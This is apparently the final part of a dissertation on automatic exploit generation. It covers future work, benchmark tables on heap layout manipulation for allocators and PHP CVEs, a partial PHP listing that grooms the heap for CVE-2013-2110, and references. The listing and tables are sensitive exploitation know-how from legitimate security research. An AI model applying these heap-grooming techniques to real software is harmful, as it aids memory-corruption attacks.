Among the exploit development community the concept of treating exploit writing as programming is not a new idea. With the exploitation of interpreters the connection is quite clear, as much of the exploit's contents are indistinguishable from a 'normal' program in the language of that interpreter. The difference arises once a vulnerability is used to, for example, corrupt memory, at which point the exploit developer can leverage the resulting corruption to construct a new API for the interpreter that allows them to manipulate its memory as desired. Often, exploit developers for interpreters will use the vulnerability to construct an explicit new API containing functions like readmem and writemem for reading and writing memory, and then continue to program their exploit using these functions. This explicit connection to programming is not always there. For example, when exploiting a target like a network daemon it is less obvious that what one is doing by sending data to the service may be conceptualised as programming. With a little consideration, however, the idea is still there: the attacker sends data, the data influences what branches are taken and thus what code is executed, and therefore the attacker is selecting how other data is processed and manipulated, i.e. they are programming. This idea was recently formalised in the general context by Dullien [53]. If exploitation is programming, then perhaps automatic exploit generation can be considered as a program synthesis problem. There is a significant body of work on the program synthesis problem and it is likely that the exploit generation community can find much to learn from it. In the other direction, exploit generation presents a number of unique challenges that are not found in standard program synthesis tasks, and by searching for ways to address these we can likely push forward our understanding of the synthesis problem.

Automatic Exploitation API Construction

An important problem to be able to solve in exploit generation is: given one or more vulnerabilities for a piece of target software, can we construct an exploitation 'API' for it? That is, can we construct a set of functions that an exploit developer can use to read and write both absolute and relative memory addresses? Why would we construct an API rather than an exploit? Exploits are often constructed in this manner when written by exploit developers, rather than automatically. It allows one to separate the task of coming up with target-specific exploitation strategies, given a set of primitives, from the task of turning vulnerabilities into primitives.

By constructing such an API we open up the possibility of AEG that uses it, provided a strategy is available for constructing an exploit from the primitives. However, even if there is no follow-on automated step, simply having automated the construction of this API saves the exploit developer a tremendous amount of time. In Chapter 5, I showed how Gollum can be used to detect primitives in different categories, and how it can automatically construct exploits from the primitives in a subset of these categories. As mentioned in Section 5.8, there is further research to be done on figuring out how to isolate and reuse primitives, and the problem of constructing read primitives is entirely open. Sometimes it may also be desirable to have a slightly higher level of abstraction in the primitive API; e.g. when exploiting a JavaScript interpreter one might want a primitive to get the address of an object, or to rewrite its contents, directly [70]. This too is an open problem. The work I have presented here represents only the first steps towards solutions to these problems, and a significant amount of work remains before we can automatically construct such rich APIs for an exploit developer.

Automation of ASLR Breaks

All existing work on exploit generation either assumes that ASLR is disabled or, like ours, assumes that a break for ASLR is provided. For interpreters, given that ASLR breaks can often be crafted independently of the rest of an exploit and reused between exploits, this is a reasonable assumption. However, building such an ASLR break is often non-trivial, and so automating the task would be useful work. ASLR breaks can take many different forms, including vulnerabilities that directly return uninitialised memory [104] or over-read from a buffer [105], primitives constructed from memory corruption, use-after-free or type confusion vulnerabilities that allow an attacker to read from absolute or relative memory addresses [71], and more unusual variants, such as side-channel attacks [106]. Automatic construction of ASLR breaks in the second category, namely primitives constructed from vulnerabilities, is likely to be achievable in a manner similar to the approach discussed in this dissertation.

Exploitation with Reduced Control

In this work I have assumed that the vulnerability gives effectively full control over a data or control related pointer. Many interesting challenges arise when one varies the number of bytes of a pointer that can be controlled, or the amount of control one has over the values written. For example, vulnerabilities that allow one to write a single zero byte beyond the end of a buffer are common. Figuring out how to automatically exploit vulnerabilities that provide such reduced control is an open problem.

Appendices



Allocator Title    # Interactions    # Allocs    # Frees
php-emalloc        571               366         205
php-malloc         15078             12714       2634
python-malloc      6160              3710        2450
ruby-malloc        70895             51827       19068

Table 1: Summary of the heap initialisation sequences for synthetic benchmarks. All sequences were captured by hooking the malloc, free, realloc and calloc functions of the system allocator, except for php-emalloc, which was captured by hooking the allocation functions of the custom allocator that comes with PHP.

Allocation Type     Size    Function
gdImage             7360    imagecreate
xmlwriter_object    16      xmlwriter_open_memory
php_hash_data       32      hash_init
int *               8       imagecreatetruecolor
Scanner             24      date_create
timelib_tzinfo      160     mktime
HashTable           264     timezone_identifier_list
php_interval_obj    64      unserialize
int *               40      imagecreatetruecolor
php_stream          232     stream_socket_pair

Table 2: Target structures used in evaluating SHRIKE. Each has a pointer as its first field.

Table 3: Synthetic benchmark results. For each experiment the search was run for a maximum of 500,000 candidates. All experiments were run 9 times and the results below are the average of those runs. ‘% Solved’ is the percentage of the 72 experiments for each row in which an input was found placing the source and destination adjacent to each other. ‘% Natural’ is the percentage of the 36 natural allocation order to corruption direction experiments which were solved. ‘% Reversed’ is the percentage of the 36 reversed allocation order to corruption direction experiments which were solved.

Allocator        Start State      Noise    % Solved    % Natural    % Reversed
avrlibc-r2537    php-emalloc      0        100         100          100
avrlibc-r2537    php-malloc       0        100         100          100
avrlibc-r2537    python-malloc    0        100         100          100
avrlibc-r2537    ruby-malloc      0        99          100          98
dlmalloc-2.8.6   php-emalloc      0        99          100          99
dlmalloc-2.8.6   php-malloc       0        100         100          100
dlmalloc-2.8.6   python-malloc    0        99          100          97
dlmalloc-2.8.6   ruby-malloc      0        99          100          98
tcmalloc-2.6.1   php-emalloc      0        73          79           67
tcmalloc-2.6.1   php-malloc       0        77          80           75
tcmalloc-2.6.1   python-malloc    0        63          63           62
tcmalloc-2.6.1   ruby-malloc      0        75          78           71
avrlibc-r2537    php-emalloc      1        55          51           59
avrlibc-r2537    php-malloc       1        51          46           56
avrlibc-r2537    python-malloc    1        49          51           46
avrlibc-r2537    ruby-malloc      1        49          50           48
dlmalloc-2.8.6   php-emalloc      1        49          65           32
dlmalloc-2.8.6   php-malloc       1        49          62           37
dlmalloc-2.8.6   python-malloc    1        42          56           27
dlmalloc-2.8.6   ruby-malloc      1        43          58           27
tcmalloc-2.6.1   php-emalloc      1        52          59           45
tcmalloc-2.6.1   php-malloc       1        55          61           48
tcmalloc-2.6.1   python-malloc    1        50          52           48
tcmalloc-2.6.1   ruby-malloc      1        53          61           44
avrlibc-r2537    php-emalloc      4        43          44           42
avrlibc-r2537    php-malloc       4        40          41           40
avrlibc-r2537    python-malloc    4        42          47           37
avrlibc-r2537    ruby-malloc      4        39          45           33
dlmalloc-2.8.6   php-emalloc      4        34          51           16
dlmalloc-2.8.6   php-malloc       4        31          44           17
dlmalloc-2.8.6   python-malloc    4        33          50           16
dlmalloc-2.8.6   ruby-malloc      4        35          51           20
tcmalloc-2.6.1   php-emalloc      4        40          53           27
tcmalloc-2.6.1   php-malloc       4        39          53           25
tcmalloc-2.6.1   python-malloc    4        32          42           22
tcmalloc-2.6.1   ruby-malloc      4        38          54           22

Table 4: Results of heap layout manipulation for vulnerabilities in PHP. Experiments were run for a maximum of 12 hours. All experiments were run 3 times and the results below are the average of these runs. ‘Src. Size’ is the size in bytes of the source allocation. ‘Dst. Size’ is the size in bytes of the destination allocation. ‘Src./Dst. Noise’ is the number of noisy allocations triggered by the allocation of the source and destination. ‘Manip. Seq. Noise’ is the amount of noise in the sequences available to SHRIKE for allocating and freeing buffers with size equal to the source and destination. ‘Initial Dist.’ is the distance from the source to the destination if they are allocated without any attempt at heap layout manipulation. ‘Final Dist.’ is the distance from the source to the destination in the best result that SHRIKE could find. A distance of 0 means the problem was solved and the source and destination were immediately adjacent. ‘Time to Best’ is the number of seconds required to find the best result. ‘Candidates to Best’ is the number of candidates required to find the best result.

CVE ID       Src. Size   Dst. Size   Src./Dst. Noise   Manip. Seq. Noise   Initial Dist.   Final Dist.   Time to Best   Candidates to Best
2015-8865    480         7360        0                 0                   -16384          0             <1             106
2015-8865    480         16          0                 0                   -491424         0             170            218809
2015-8865    480         32          0                 0                   -96832          0             217            286313
2015-8865    480         8           0                 1                   -540664         0             642            862689
2015-8865    480         24          0                 0                   -151456         0             16             13263
2015-8865    480         160         0                 0                   -57344          0             <1             63
2015-8865    480         264         0                 0                   -137344         0             <1             84
2015-8865    480         64          1                 0                   -499520         0             12             13967
2015-8865    480         40          0                 0                   -128832         0             25             15113
2015-8865    480         232         0                 0                   -101376         0             <1             69
2016-5093    544         7360        1                 0                   84736           0             <1             640
2016-5093    544         16          0                 0                   -402592         0             4202           5295968
2016-5093    544         32          0                 0                   -7776           0             2392           3014661
2016-5093    544         8           0                 1                   -406776         8             6905           9049924
2016-5093    544         24          0                 0                   -62624          0             202            231884
2016-5093    544         160         0                 0                   80640           0             <1             104
2016-5093    544         264         0                 0                   -27712          0             <1             76
2016-5093    544         64          1                 0                   -410624         0             487            607824
2016-5093    544         40          0                 0                   -31648          0             15             458
2016-5093    544         232         0                 0                   77312           0             3              116
2016-7126    1           7360        4                 2                   495576          0             958            1181098
2016-7126    1           16          0                 4                   4360            88            4816           6260800
2016-7126    1           32          1                 1                   398808          64            5594           7272200
2016-7126    1           8           3                 2                   -32             0             2662           3356935
2016-7126    1           24          3                 1                   344152          56            4199           5458700
2016-7126    1           160         14                1                   483288          24            3005           3864430
2016-7126    1           264         0                 1                   379064          24            5917           7615179
2016-7126    1           64          1                 3                   -3912           72            2752           3539072
2016-7126    1           40          5                 1                   375248          144           7980           10134600
2016-7126    1           232         0                 1                   439288          40            5673           7908162



 5 $var_vtx_0 = str_repeat("747X", 58);
 6 $var_vtx_1 = str_repeat("747X", 58);
 7 $var_vtx_2 = str_repeat("747X", 58);
 8 $var_vtx_3 = imagecreatetruecolor(346, 48);
 9 <...>
10 shrike_record_alloc(0, 1);
11 $image = imagecreate(1, 2);
12 <...>
13 $var_vtx_300 = str_repeat("747X", 58);
14 $var_vtx_3 = 0;
15 <...>
16 shrike_record_alloc(0, 2);
17 quoted_printable_encode($quote_str);
18 $distance = shrike_get_distance(1, 2);
19 if ($distance != 384) {
20     exit("Invalid layout.\n");
21 }

Listing 1: Part of the solution discovered for using CVE-2013-2110 to corrupt the gdImage structure, which is the 1st allocation made by imagecreate on line 11. Multiple calls are made to functions that have been discovered to trigger the desired allocator interactions. Frees are triggered by destroying previously created objects, as can be seen with $var_vtx_3 on line 14. The overflow source is the 1st allocation performed by quoted_printable_encode on line 17.

References

[1] Marc Andreessen. “Why Software Is Eating the World”. In: The Wall Street Journal (Aug. 2011). url: https://a16z.com/2011/08/20/why-software-is-eating-the-world/.
[2] N. G. Leveson and C. S. Turner. “An investigation of the Therac-25 accidents”. In: Computer 26.7 (July 1993), pp. 18–41.
[3] Douglas N. Arnold. The Patriot Missile Failure. Aug. 2000. url: http://www-users.math.umn.edu/~arnold//disasters/patriot.html (visited on 07/09/2019).
[4] Eric Schmitt. “U.S. Details Flaw in Patriot Missile”. In: The New York Times (June 1991). url: https://www.nytimes.com/1991/06/06/world/us-details-flaw-in-patriot-missile.html (visited on 07/09/2019).
[5] Jacques-Louis Lions et al. ARIANE 5 Flight 501 Failure. July 1996. url: http://sunnyday.mit.edu/nasa-class/Ariane5-report.html (visited on 07/09/2019).
[6] U.S.-Canada Power System Outage Task Force. Final Report on the August 14th, 2003 Blackout in the United States and Canada: Causes and Recommendations. Apr. 2004. url: https://www.energy.gov/sites/prod/files/oeprod/DocumentsandMedia/BlackoutFinal-Web.pdf (visited on 07/09/2019).
[7] Arash Massoudi. “Knight Capital glitch loss hits $461m”. In: The Financial Times (Oct. 2012). url: https://www.ft.com/content/928a1528-1859-11e2-80e9-00144feabdc0 (visited on 07/09/2019).
[8] Bishr Tabbaa. The Rise and Fall of Knight Capital — Buy High, Sell Low. Rinse and Repeat. Aug. 2018. url: https://medium.com/@bishr_tabbaa/the-rise-and-fall-of-knight-capital-buy-high-sell-low-rinse-and-repeat-ae17fae780f6 (visited on 07/09/2019).
[9] FBI. The Morris Worm: 30 Years Since the First Major Attack on the Internet. Nov. 2018. url: https://www.fbi.gov/news/stories/morris-worm-30-years-since-first-major-attack-on-internet-110218 (visited on 11/10/2019).
[10] T. Eisenberg et al. “The Cornell Commission: On Morris and the Worm”. In: Commun. ACM 32.6 (June 1989), pp. 706–709. url: http://doi.acm.org/10.1145/63526.63530.


[11] Crowdstrike. Meet The Advanced Persistent Threats: List of Cyber Threat Actors. June 2018. url: https://www.crowdstrike.com/blog/meet-the-adversaries/ (visited on 09/20/2019).
[12] Crowdstrike. Meet CrowdStrike’s Adversary of the Month for April: STARDUST CHOLLIMA. Apr. 2018. url: https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/ (visited on 09/20/2019).
[13] Crowdstrike. Meet CrowdStrike’s Adversary of the Month for May: MYTHIC LEOPARD. May 2018. url: https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/ (visited on 09/20/2019).
[14] Immunity. CANVAS. url: https://www.immunitysec.com/products/canvas/index.html (visited on 09/20/2019).
[15] Core Security. Core Impact. url: https://www.coresecurity.com/core-impact (visited on 09/20/2019).
[16] Zero Day Initiative. Pwn2Own Vancouver 2019: Day One Results. Mar. 2019. url: https://www.zerodayinitiative.com/blog/2019/3/20/pwn2own-vancouver-2019-day-one-results (visited on 09/20/2019).
[17] Georgi Geshev and Robert Miller. “Chainspotting: Building Exploit Chains with Logic Bugs”. In: Infiltrate 2018. Apr. 2018.
[18] American National Standards Institute. ANSI X3.159-1989 “Programming Language C”. Dec. 1990.
[19] James C. King. “Symbolic Execution and Program Testing”. In: Commun. ACM 19.7 (July 1976), pp. 385–394. url: http://doi.acm.org/10.1145/360248.360252.
[20] Cristian Cadar, Daniel Dunbar, and Dawson Engler. “KLEE: Unassisted and Automatic Generation of High-coverage Tests for Complex Systems Programs”. In: Proceedings of the 8th USENIX Conference on Operating Systems Design and Implementation. OSDI’08. San Diego, California. Berkeley, CA, USA: USENIX Association, 2008, pp. 209–224. url: http://dl.acm.org/citation.cfm?id=1855741.1855756.
[21] David A. Ramos and Dawson Engler. “Under-Constrained Symbolic Execution: Correctness Checking for Real Code”. In: 24th USENIX Security Symposium (USENIX Security 15). Washington, D.C.: USENIX Association, Aug. 2015, pp. 49–64. url: https://www.usenix.org/conference/usenixsecurity15/technical-sessions/presentation/ramos.
[22] Maria Christakis and Patrice Godefroid. “Proving Memory Safety of the ANI Windows Image Parser Using Compositional Exhaustive Testing”. In: Proceedings of the 16th International Conference on Verification, Model Checking, and Abstract Interpretation - Volume 8931. VMCAI 2015. Mumbai, India. New York, NY, USA: Springer-Verlag New York, Inc., 2015, pp. 373–392. url: http://dx.doi.org/10.1007/978-3-662-46081-8_21.

[23] P. Cousot and R. Cousot. “Abstract interpretation: a unified lattice model for static analysis of programs by construction or approximation of fixpoints”. In: Conference Record of the Fourth Annual ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages. Los Angeles, California: ACM Press, New York, NY, 1977, pp. 238–252.
[24] Gary A. Kildall. “A Unified Approach to Global Program Optimization”. In: Proceedings of the 1st Annual ACM SIGACT-SIGPLAN Symposium on Principles of Programming Languages. POPL ’73. Boston, Massachusetts. New York, NY, USA: ACM, 1973, pp. 194–206. url: http://doi.acm.org/10.1145/512927.512945.
[25] Barton P. Miller, Louis Fredriksen, and Bryan So. “An Empirical Study of the Reliability of UNIX Utilities”. In: Commun. ACM 33.12 (Dec. 1990), pp. 32–44. url: http://doi.acm.org/10.1145/96267.96279.
[26] Michal Zalewski. AFL. url: http://lcamtuf.coredump.cx/afl/ (visited on 07/08/2019).
[27] libFuzzer – a library for coverage-guided fuzz testing. url: https://llvm.org/docs/LibFuzzer.html (visited on 07/20/2019).
[28] Brendan Dolan-Gavitt. Fuzzing with AFL is an Art. July 2016. url: https://moyix.blogspot.com/2016/07/fuzzing-with-afl-is-an-art.html (visited on 07/20/2019).
[29] Make AFL-fuzzing wide constants more viable with another llvm pass. July 2016. url: https://groups.google.com/forum/#!msg/afl-users/NVAtvespaBg/3qnWpwA_BwAJ (visited on 07/20/2019).
[30] Circumventing Fuzzing Roadblocks with Compiler Transformations. Aug. 2016. url: https://lafintel.wordpress.com/2016/08/15/circumventing-fuzzing-roadblocks-with-compiler-transformations/ (visited on 07/20/2019).
[31] Konstantin Serebryany et al. “AddressSanitizer: A Fast Address Sanity Checker”. In: Presented as part of the 2012 USENIX Annual Technical Conference (USENIX ATC 12). Boston, MA: USENIX, 2012, pp. 309–318. url: https://www.usenix.org/conference/atc12/technical-sessions/presentation/serebryany.
[32] Sean Heelan. “Automatic generation of control flow hijacking exploits for software vulnerabilities”. MA thesis. University of Oxford, 2009. url: https://www.cprover.org/dissertations/thesis-Heelan.pdf (visited on 06/23/2019).
[33] Thanassis Avgerinos et al. “AEG: Automatic Exploit Generation”. In: Network and Distributed System Security Symposium. Feb. 2011.
[34] Sang Kil Cha et al. “Unleashing Mayhem on Binary Code”. In: Proceedings of the 2012 IEEE Symposium on Security and Privacy. SP ’12. Washington, DC, USA: IEEE Computer Society, 2012, pp. 380–394. url: https://doi.org/10.1109/SP.2012.31 (visited on 06/23/2019).
[35] DARPA. DARPA Announces Cyber Grand Challenge. Oct. 2013. url: https://www.darpa.mil/news-events/2013-10-22 (visited on 09/23/2019).

[36] Nick Stephens et al. “Driller: Augmenting Fuzzing Through Selective Symbolic Execution”. In: 23rd Annual Network and Distributed System Security Symposium, NDSS 2016, San Diego, California, USA, February 21-24, 2016. url: http://wp.internetsociety.org/ndss/wp-content/uploads/sites/25/2017/09/driller-augmenting-fuzzing-through-selective-symbolic-execution.pdf.
[37] Tyler Nighswander. Unleashing Mayhem. Feb. 2016. url: https://blog.forallsecure.com/unleashing-mayhem (visited on 06/23/2019).
[38] GrammaTech. The Cyber Grand Challenge. Sept. 2016. url: http://blogs.grammatech.com/the-cyber-grand-challenge (visited on 06/23/2019).
[39] Artem Dinaburg. How We Fared in the Cyber Grand Challenge. July 2015. url: https://blog.trailofbits.com/2015/07/15/how-we-fared-in-the-cyber-grand-challenge/ (visited on 06/23/2019).
[40] Dusan Repel, Johannes Kinder, and Lorenzo Cavallaro. “Modular Synthesis of Heap Exploits”. In: Proceedings of the 2017 Workshop on Programming Languages and Analysis for Security. PLAS ’17. Dallas, Texas, USA. New York, NY, USA: ACM, 2017, pp. 25–35. url: http://doi.acm.org/10.1145/3139337.3139346 (visited on 06/23/2019).
[41] Yan Wang et al. “Revery: From Proof-of-Concept to Exploitable”. In: ACM, Aug. 2018, pp. 1914–1927. url: http://dl.acm.org/citation.cfm?id=3243734.3243847 (visited on 07/08/2019).
[42] Moritz Eckert et al. “HeapHopper: Bringing Bounded Model Checking to Heap Implementation Security”. In: 27th USENIX Security Symposium (USENIX Security 18). Baltimore, MD: USENIX Association, 2018, pp. 99–116. url: https://www.usenix.org/conference/usenixsecurity18/presentation/eckert.
[43] Wei Wu et al. “FUZE: Towards Facilitating Exploit Generation for Kernel Use-After-Free Vulnerabilities”. In: 2018, pp. 781–797. url: https://www.usenix.org/node/217627 (visited on 07/08/2019).
[44] Wei Wu et al. “KEPLER: Facilitating Control-flow Hijacking Primitive Evaluation for Linux Kernel Vulnerabilities”. In: 28th USENIX Security Symposium (USENIX Security 19). Santa Clara, CA: USENIX Association, Aug. 2019, pp. 1187–1204. url: https://www.usenix.org/conference/usenixsecurity19/presentation/wu-wei.
[45] Yueqi Chen and Xinyu Xing. “SLAKE: Facilitating Slab Manipulation for Exploiting Vulnerabilities in the Linux Kernel”. In: Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security. CCS ’19. London, United Kingdom. New York, NY, USA: ACM, 2019, pp. 1707–1722. url: http://doi.acm.org/10.1145/3319535.3363212.

[46] Behrad Garmany et al. “Towards Automated Generation of Exploitation Primitives for Web Browsers”. In: Proceedings of the 34th Annual Computer Security Applications Conference. ACSAC ’18. San Juan, PR, USA. New York, NY, USA: ACM, 2018, pp. 300–312. url: http://doi.acm.org/10.1145/3274694.3274723 (visited on 07/08/2019).
[47] Edward J. Schwartz, Thanassis Avgerinos, and David Brumley. “Q: Exploit Hardening Made Easy”. In: Proceedings of the 20th USENIX Conference on Security. SEC’11. San Francisco, CA. Berkeley, CA, USA: USENIX Association, 2011, pp. 25–25. url: http://dl.acm.org/citation.cfm?id=2028067.2028092.
[48] Tiffany Bao et al. “Your Exploit is Mine: Automatic Shellcode Transplant for Remote Exploits”. In: IEEE Symposium on Security and Privacy. 2017.
[49] Kyriakos K. Ispoglou et al. “Block Oriented Programming: Automating Data-Only Attacks”. In: Proceedings of the 2018 ACM SIGSAC Conference on Computer and Communications Security. CCS ’18. Toronto, Canada. New York, NY, USA: ACM, 2018, pp. 1868–1882. url: http://doi.acm.org/10.1145/3243734.3243739.
[50] Shuo Chen et al. “Non-Control-Data Attacks Are Realistic Threats”. In: Proceedings of the USENIX Security Symposium. USENIX, Aug. 2005. url: https://www.microsoft.com/en-us/research/publication/non-control-data-attacks-are-realistic-threats/.
[51] Hong Hu et al. “Automatic Generation of Data-Oriented Exploits”. In: 24th USENIX Security Symposium (USENIX Security 15). Washington, D.C.: USENIX Association, 2015, pp. 177–192. url: https://www.usenix.org/conference/usenixsecurity15/technical-sessions/presentation/hu.
[52] H. Hu et al. “Data-Oriented Programming: On the Expressiveness of Non-control Data Attacks”. In: 2016 IEEE Symposium on Security and Privacy (SP). May 2016, pp. 969–986.
[53] T. F. Dullien. “Weird machines, exploitability, and provable unexploitability”. In: IEEE Transactions on Emerging Topics in Computing (2019), pp. 1–1.
[54] Sergey Bratus et al. “Exploit Programming: From Buffer Overflows to "Weird Machines" and Theory of Computation”. In: USENIX ;login: 36.6 (Dec. 2011).
[55] Julien Vanegue. Heap Models for Exploit Systems. May 2015. url: http://spw15.langsec.org/slides/spw15_heap_models_vanegue.pdf (visited on 06/23/2019).
[56] Julien Vanegue. “The Automated Exploitation Grand Challenge”. In: H2HC 2013. Oct. 2013. url: https://openwall.info/wiki/_media/people/jvanegue/files/aegc_vanegue.pdf.
[57] Chris Valasek and Tarjei Mandt. “Windows 8 Heap Internals”. In: Blackhat USA 2012. Aug. 2012.
[58] Mark Vincent Yason. “Windows 10 Segment Heap Internals”. In: Blackhat USA 2016. Aug. 2016.

[59] Tarjei Mandt. “Kernel Pool Exploitation on Windows 7”. In: Blackhat USA 2011. Aug. 2011.
[60] John McDonald and Chris Valasek. “Practical Windows XP/2003 Exploitation”. In: Blackhat USA 2009. Aug. 2009.
[61] Phantasmal Phantasmagoria. The Malloc Maleficarum. Oct. 2005. url: http://seclists.org/bugtraq/2005/Oct/118 (visited on 06/23/2019).
[62] jp. “Advanced Doug Lea’s Malloc Exploits”. In: Phrack 61 (Aug. 2003). url: http://phrack.com/issues/61/6.html (visited on 06/23/2019).
[63] MaXX. “Vudo Malloc Tricks”. In: Phrack 57 (Aug. 2001). url: http://phrack.com/issues/57/8.html (visited on 06/23/2019).
[64] argp and huku. “Exploiting VLC: A case study on jemalloc heap overflows”. In: Phrack 68 (Apr. 2012). url: http://phrack.com/issues/68/13.html (visited on 06/23/2019).
[65] argp. “OR’LYEH? The Shadow over Firefox”. In: Phrack 69 (Apr. 2016). url: http://phrack.com/issues/69/14.html (visited on 06/23/2019).
[66] Alexander Sotirov. “Heap Feng Shui in Javascript”. In: Blackhat USA 2007. Aug. 2007.
[67] Roee Hay. Exploitation of CVE-2009-1869. Aug. 2009. url: https://securityresear.ch/2009/08/03/exploitation-of-cve-2009-1869/ (visited on 06/23/2019).
[68] Dion Blazakis. “Interpreter Exploitation: Pointer Inference and JIT Spraying”. In: Blackhat USA 2010. Aug. 2010.
[69] scut. Exploiting format string vulnerabilities. Sept. 2001. url: http://julianor.tripod.com/bc/formatstring-1.2.pdf (visited on 07/08/2019).
[70] saelo. “Attacking JavaScript Engines - A case study of JavaScriptCore and CVE-2016-4622”. In: Oct. 2016. url: http://phrack.com/papers/attacking_javascript_engines.html (visited on 10/30/2019).
[71] Samuel Gross. Pwn2Own 2018: Safari + macOS. 2018. url: https://github.com/saelo/pwn2own2018 (visited on 10/27/2019).
[72] David Brumley et al. “Automatic Patch-Based Exploit Generation is Possible: Techniques and Implications”. In: Proceedings of the 2008 IEEE Symposium on Security and Privacy. SP ’08. Washington, DC, USA: IEEE Computer Society, 2008, pp. 143–157. url: https://doi.org/10.1109/SP.2008.17.
[73] Paul R. Wilson et al. “Dynamic Storage Allocation: A Survey and Critical Review”. In: Proceedings of the International Workshop on Memory Management. IWMM ’95. London, UK: Springer-Verlag, 1995, pp. 1–116. url: http://dl.acm.org/citation.cfm?id=645647.664690 (visited on 06/23/2019).
[74] Anonymous. “Once Upon a free()”. In: Phrack 57 (Aug. 2001). url: http://phrack.com/issues/57/9.html (visited on 06/23/2019).

[75] argp and huku. “Pseudomonarchia Jemallocum”. In: Phrack 68 (Apr. 2012). url: http://phrack.com/issues/68/10.html (visited on 06/23/2019).
[76] Doug Lea. A Memory Allocator. Apr. 2000. url: http://gee.cs.oswego.edu/dl/html/malloc.html (visited on 06/24/2019).
[77] Jason Evans. “A Scalable Concurrent malloc(3) Implementation for FreeBSD”. In: BSDCan 2006. Apr. 2006. url: https://www.bsdcan.org/2006/papers/jemalloc.pdf (visited on 06/24/2019).
[78] The AVR Libc Developers. AVR Libc. url: http://www.nongnu.org/avr-libc/ (visited on 06/24/2019).
[79] Sanjay Ghemawat and Paul Menage. TCMalloc: Thread-Caching Malloc. url: http://goog-perftools.sourceforge.net/doc/tcmalloc.html (visited on 06/24/2019).
[80] Solar Designer. JPEG COM Marker Processing Vulnerability (in Browsers and Products) and a Generic Heap-Based Buffer Overflow Exploitation Technique. July 2000. url: http://www.openwall.com/articles/JPEG-COM-Marker-Vulnerability (visited on 06/23/2019).
[81] Emery D. Berger and Benjamin G. Zorn. “DieHard: Probabilistic Memory Safety for Unsafe Languages”. In: Proceedings of the 27th ACM SIGPLAN Conference on Programming Language Design and Implementation. PLDI ’06. Ottawa, Ontario, Canada. New York, NY, USA: ACM, 2006, pp. 158–168. url: http://doi.acm.org/10.1145/1133981.1134000 (visited on 06/23/2019).
[82] Gene Novark and Emery D. Berger. “DieHarder: Securing the Heap”. In: Proceedings of the 17th ACM Conference on Computer and Communications Security. CCS ’10. Chicago, Illinois, USA. New York, NY, USA: ACM, 2010, pp. 573–584. url: http://doi.acm.org/10.1145/1866307.1866371 (visited on 06/23/2019).
[83] Stefan Esser. “State of the Art Post Exploitation in Hardened PHP Environments”. In: Blackhat USA 2009. Aug. 2009.
[84] Christian Holler, Kim Herzig, and Andreas Zeller. “Fuzzing with Code Fragments”. In: Presented as part of the 21st USENIX Security Symposium (USENIX Security 12). Bellevue, WA: USENIX, 2012, pp. 445–458. url: https://www.usenix.org/conference/usenixsecurity12/technical-sessions/presentation/holler.
[85] Sean Heelan. “Ghosts of Christmas Past: Fuzzing Language Interpreters using Regression Tests”. In: Infiltrate 2014. Apr. 2014.
[86] Berthold Kröger. “Guillotineable bin packing: A genetic approach”. In: European Journal of Operational Research 84.3 (1995), pp. 645–661. url: http://www.sciencedirect.com/science/article/pii/037722179500029P.
[87] Alexander Kerr and Kieran Mullen. “A comparison of genetic algorithms and simulated annealing in maximizing the thermal conductance of harmonic lattices”. In: Computational Materials Science 157 (2019), pp. 31–36. url: http://www.sciencedirect.com/science/article/pii/S0927025618306682.

[88] Michael Andresen et al. “Simulated annealing and genetic algorithms for minimizing mean flow time in an open shop”. In: Mathematical and Computer Modelling 48.7 (2008), pp. 1279–1293. url: http://www.sciencedirect.com/science/article/pii/S0895717708000423.
[89] John H. Holland. Adaptation in Natural and Artificial Systems. MIT Press, 1975.
[90] D. Beasley, D. R. Bull, and R. R. Martin. “An overview of Genetic Algorithms: Pt1, Fundamentals”. In: University Computing 15 (1993), pp. 58–69.
[91] Richard S. Sutton and Andrew G. Barto. Introduction to Reinforcement Learning. 1st. Cambridge, MA, USA: MIT Press, 1998.
[92] Matej Črepinšek, Shih-Hsi Liu, and Marjan Mernik. “Exploration and Exploitation in Evolutionary Algorithms: A Survey”. In: ACM Comput. Surv. 45.3 (July 2013), 35:1–35:33. url: http://doi.acm.org/10.1145/2480741.2480752.
[93] David E. Goldberg. Genetic Algorithms in Search, Optimization and Machine Learning. 1st. Boston, MA, USA: Addison-Wesley Longman Publishing Co., Inc., 1989.
[94] Sean Luke and Liviu Panait. “Fighting Bloat with Nonparametric Parsimony Pressure”. In: Parallel Problem Solving from Nature — PPSN VII. Ed. by Juan Julián Merelo Guervós et al. Berlin, Heidelberg: Springer Berlin Heidelberg, 2002, pp. 411–421.
[95] Félix-Antoine Fortin et al. “DEAP: Evolutionary Algorithms Made Easy”. In: Journal of Machine Learning Research 13 (July 2012), pp. 2171–2175.
[96] Gabe Pike. Python Sandbox Escape. Mar. 2017. url: https://hackernoon.com/python-sandbox-escape-via-a-memory-corruption-bug-19dde4d5fea5 (visited on 07/08/2019).
[97] Shopify. HackerOne shopify-scripts Bug Bounty Program. url: https://hackerone.com/shopify-scripts (visited on 07/08/2019).
[98] Yeongjin Jang. Integer Overflow Vulnerabilities in Language Interpreters. Oct. 2016. url: https://gts3.org/2016/lang-bug.html (visited on 07/08/2019).
[99] david942j. one_gadget. url: https://github.com/david942j/one_gadget (visited on 07/08/2019).
[100] Lorenzo Cavallaro, Prateek Saxena, and R. Sekar. “On the Limits of Information Flow Techniques for Malware Analysis and Containment”. In: Detection of Intrusions and Malware, and Vulnerability Assessment. Ed. by Diego Zamboni. Springer Berlin Heidelberg, 2008, pp. 143–163.
[101] Rohit Mothe and Rodrigo Rubira Branco. “DPTrace: Dual Purpose Trace for Exploitability Analysis of Program Crashes”. In: Blackhat USA 2016. 2016.
[102] David Tomaschik. GOT and PLT for pwning. Mar. 2017. url: https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html (visited on 07/08/2019).
[103] Yan Shoshitaishvili et al. “SoK: (State of) The Art of War: Offensive Techniques in Binary Analysis”. In: IEEE Symposium on Security and Privacy. 2016.

[104] Chris Evans. *bleed continues: 18 byte file, $14k bounty, for leaking private Yahoo! Mail images. May 2017. url: https://scarybeastsecurity.blogspot.com/2017/05/bleed-continues-18-byte-file-14k-bounty.html (visited on 10/27/2019).
[105] OpenSSL. TLS heartbeat read overrun (CVE-2014-0160). Apr. 2014. url: https://www.openssl.org/news/secadv/20140407.txt (visited on 10/27/2019).
